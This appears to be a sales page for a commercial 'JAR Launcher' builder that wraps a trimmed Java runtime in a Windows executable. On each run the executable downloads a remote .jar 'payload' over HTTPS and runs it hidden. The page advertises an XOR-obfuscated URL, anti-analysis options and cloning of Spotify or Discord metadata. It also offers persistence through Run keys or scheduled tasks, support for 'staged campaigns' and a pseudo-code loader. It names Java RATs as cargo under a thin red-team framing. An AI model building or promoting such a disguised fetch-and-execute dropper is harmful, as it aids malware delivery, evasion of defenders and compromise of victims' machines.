The JAR Launcher packages a minimal-footprint Java runtime inside a single native Windows executable. At runtime, the launcher unpacks the bundled JRE to a temp location, fetches your .jar payload from the configured HTTPS URL, then invokes javaw.exe on the freshly-downloaded JAR — fully transparent to the user.
This is a URL-only delivery model. The .jar bytecode is never embedded in the wrapper, keeping the static binary small and free of Java signatures. It also lets you swap, rotate, or revoke the payload server-side without rebuilding the launcher.
URL-only. Host your .jar on an HTTPS endpoint. The launcher fetches and runs it on every execution.
Choose minimal JRE: 8, 11, 17, 21 (LTS lines). Builder bundles only required modules.
Visual spoof, hidden console, anti-analysis options, launch parameters.
Output: native .exe bundling the JRE only — the JAR stays on your server.
Uses jlink-style modular JRE (Java 11+) trimmed to only modules your JAR needs — typically 25–40 MB instead of full 200+ MB.
Launch4j-style native bootstrap: extracts the JRE to %TEMP%, fetches the JAR over HTTPS, then spawns javaw.exe -jar against the downloaded artifact.
JAR is downloaded at every launch from the configured URL. URL is XOR-encoded inside the binary; resolved at runtime. Optional TLS pinning and custom User-Agent.
Because the JAR lives on your server, you can swap, version, or geo-gate the payload without rebuilding the EXE. Useful for staged campaigns and revocation.
Optional post-execution cleanup of the temp JRE/JAR. Optional persistence variants (Run-key, scheduled task) configurable at build.
Custom icon, version-info, manifest. Optional cloning of common-app metadata (Spotify, Discord, common installers).
int WinMain(...) { ExtractEmbeddedJRE("%TEMP%\\rt"); FetchJAR(Dec(URL_ENC, KEY), "%TEMP%\\app.jar"); // HTTPS download SpawnHidden("%TEMP%\\rt\\bin\\javaw.exe", "-jar %TEMP%\\app.jar"); return 0; }
| Output Format | Native Windows PE (.exe) bundling a trimmed JRE; JAR fetched at runtime |
|---|---|
| Delivery Mode | URL only — JAR is fetched over HTTPS at every launch. No local-embed mode. |
| Architectures | x86 · x64 (matched JRE bitness) |
| OS Compatibility | Windows 7 / 8.1 / 10 / 11 |
| JRE Versions | Java 8 · 11 · 17 · 21 (LTS lines) |
| JRE Trimming | jlink modular trimming — 25–40 MB typical |
| Networking | HTTPS fetch · XOR-encoded URL · Optional TLS pinning & custom User-Agent |
| Console | Hidden (javaw.exe) or visible (java.exe) |
| Visual Spoof | Custom icon + version-info; common-app cloning |
| Persistence | Optional Run-key / Scheduled task / Startup-folder |
Ship Java-based RATs (e.g., authorized internal red-team tooling) where targets may not have Java installed.
Validate rules around Java-runtime spawns from non-standard parents and temp-extracted JREs.
Java bytecode signatures often differ in coverage from native PE — useful for measuring product complementarity.
Demonstrate that "Java not installed" is no longer protection against Java-delivered tools.
Useful when the environment has aggressive native-PE EDR but weaker Java telemetry.
Drop from any Exploit Builder builder as the Java-payload-bearing final stage.
All tiers include unlimited builds (x86 + x64), every JRE version, full encryption + in-memory load, and updates within the term.
Bundle option. Need multiple builders? The All Modules Bundle covers every builder + both launchers at a steep discount.
Pick a tier above or talk to us — we'll match the right configuration to your engagement.
